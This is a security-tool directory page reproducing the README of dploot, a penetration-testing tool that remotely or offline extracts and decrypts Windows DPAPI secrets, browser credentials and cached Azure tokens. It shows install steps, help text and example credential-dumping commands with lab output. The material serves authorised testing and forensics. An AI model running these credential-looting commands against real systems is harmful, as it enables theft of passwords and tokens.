Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
dploot — Loot and decrypt Windows DPAPI secrets remotely or offline, including masterkeys, credentials, vaults, certificates, browser data, and cached Azure tokens. | Kitploit
도구/GitHubGitHub/zblurx/dploot
Encryption/Decryption ToolsPost-ExploitationDigital ForensicsPenetration TestingCloud SecurityRed Teaming
GitHubzblurx/dploot

dploot

Loot and decrypt Windows DPAPI secrets remotely or offline, including masterkeys, credentials, vaults, certificates, browser data, and cached Azure tokens.

저장소 보기
555751715일 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
요청한 언어로 콘텐츠를 사용할 수 없습니다. 영어 버전을 표시합니다.

dploot

dploot is Python rewrite of SharpDPAPI written in C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.

If you don't know what is DPAPI, check out this post.

Table of Contents

  • dploot
    • Table of Contents
    • Installation
    • Usage
      • Protocols
      • Kerberos
    • How to use
      • Remote access via SMB
      • Remote access via WMI
      • Remote access via WinRM
      • Remote access via MSSQL
      • Local filesystem access
      • Remote access via Cobalt Strike
      • As a domain administrator
      • As a non-domain administrator
    • Commands
      • User Triage
        • masterkeys
        • credentials
        • vaults
        • rdg
        • certificates
        • browser
        • cng
        • wam
        • mobaxterm
        • triage
      • Machine Triage
        • machinemasterkeys
        • machinecredentials
        • machinevaults
        • machinecertificates
        • machinecng
        • machinetriage
      • Misc
        • wifi
        • sccm
        • backupkey
        • blob
    • Credits

Installation

You can install dploot directly from PyPI with pipx:

pipx install git+https://github.com/zblurx/dploot.git

OR

pipx install dploot

On Kali Linux, you can install dploot from the repositories:

sudo apt install python3-dploot

Usage

dploot (https://github.com/zblurx/dploot) v4.0.0 by @_zblurx
usage: dploot [-h]
              {backupkey,blob,browser,certificates,cng,credentials,machinecertificates,machinecng,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi}
              ...

DPAPI looting in Python

positional arguments:
  {backupkey,blob,browser,certificates,cng,credentials,machinecertificates,machinecng,machinecredentials,machinemasterkeys,machinetriage,machinevaults,masterkeys,mobaxterm,rdg,sccm,triage,vaults,wam,wifi}
                        Action
    backupkey           Backup Keys from domain controller
    blob                Decrypt DPAPI blob. Can fetch masterkeys on target
    browser             Dump users credentials and cookies saved in browser from local or remote target
    certificates        Dump users certificates from local or remote target
    cng                 Dump users CNG files blob from local or remote target
    credentials         Dump users Credential Manager blob from local or remote target
    machinecertificates
                        Dump system certificates from local or remote target
    machinecng          Dump system CNG files from local or remote target
    machinecredentials  Dump system credentials from local or remote target
    machinemasterkeys   Dump system masterkey from local or remote target
    machinetriage       Loot SYSTEM Masterkeys (if not set), SYSTEM credentials, SYSTEM certificates and SYSTEM vaults from local or remote target
    machinevaults       Dump system vaults from local or remote target
    masterkeys          Dump users masterkey from local or remote target
    mobaxterm           Dump Passwords and Credentials from MobaXterm
    rdg                 Dump users saved password information for RDCMan.settings from local or remote target
    sccm                Dump SCCM secrets (NAA, Collection variables, tasks sequences credentials) from local or remote target
    triage              Loot Masterkeys (if not set), credentials, rdg, certificates, browser and vaults from local or remote target
    vaults              Dump users Vaults blob from local or remote target
    wam                 Dump users cached azure tokens from local or remote target
    wifi                Dump wifi profiles from local or remote target

options:
  -h, --help            show this help message and exit

Protocols

dploot v4.0.0+ supports multiple network protocols for remote access. You select the protocol using --protocol <protocol_name>. Each protocol has different capabilities and requirements:

  • smb (default): Uses SMB/RPC for remote file access and registry operations. Works with most Windows targets. Supports Kerberos authentication. Works with impacket
  • wmi: Uses Windows Management Instrumentation (DCOM) for remote execution and registry operations. Useful alternative to SMB. Supports Kerberos authentication. Works with impacket
  • winrm: Uses Windows Remote Management for PowerShell-based operations. Common in modern environments. Works with pypsrp
  • mssql: Connects via MSSQL Server. Supports both domain and local database authentication. Supports Kerberos authentication. Works with impacket
  • local: Accesses a mounted or copied Windows filesystem directly (no network connection needed). Useful for offline analysis of physical drives or disk images.
  • cobaltstrike: Executes operations through a Cobalt Strike beacon REST API. Useful for red team operations with Cobalt Strike infrastructure.

Example using WMI protocol:

$ dploot masterkeys --protocol wmi -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5

Example using local protocol (offline filesystem):

$ dploot masterkeys --protocol local --root /mnt/c_drive -u bob -p Password

Important notes on command support:

  • Most commands support all protocols. However, backupkey only works with SMB protocol (requires domain controller access).
  • Only smb protocol supports LSA dump to automaticaly dump the DPAPI machine key. For the other protocols, you will have to bring it by yourself with --dpapi-system-key.

Kerberos

dploot can authenticate with Kerberos for the smb, wmi, and mssql protocols. Use -k to enable Kerberos with NTLM fallback. If you want to use a cached ticket, use --use-kcache. To use an AES key, use --aesKey.

$ dploot masterkeys -d waza.local -u Administrator -k -t 192.168.57.5

How to use

The goal of dploot is to simplify DPAPI related loot from a Linux box. How you use this tool depends on your access level and target configuration.

Remote access via SMB

The default protocol is SMB. This is the most common approach for DPAPI looting and works with standard Windows file sharing:

$ dploot masterkeys -d waza.local -u Administrator -p 'Password!123' -t 192.168.57.5
[*] Connected to 192.168.57.5 as waza.local\Administrator (admin)

[*] Triage ALL USERS masterkeys

{d305b55b-f0ca-40cf-b04c-3620aa5da427}:6f45f9ee77014df8a68104abd0e8d5eadb3d9f22
{d37fa151-d670-4c58-9d70-3233b4918942}:8709574524ad35ef0b3a114b93990f8490d86cba

Remote access via WMI

WMI provides an alternative to SMB for remote access and is useful when SMB is restricted:

도구 다운로드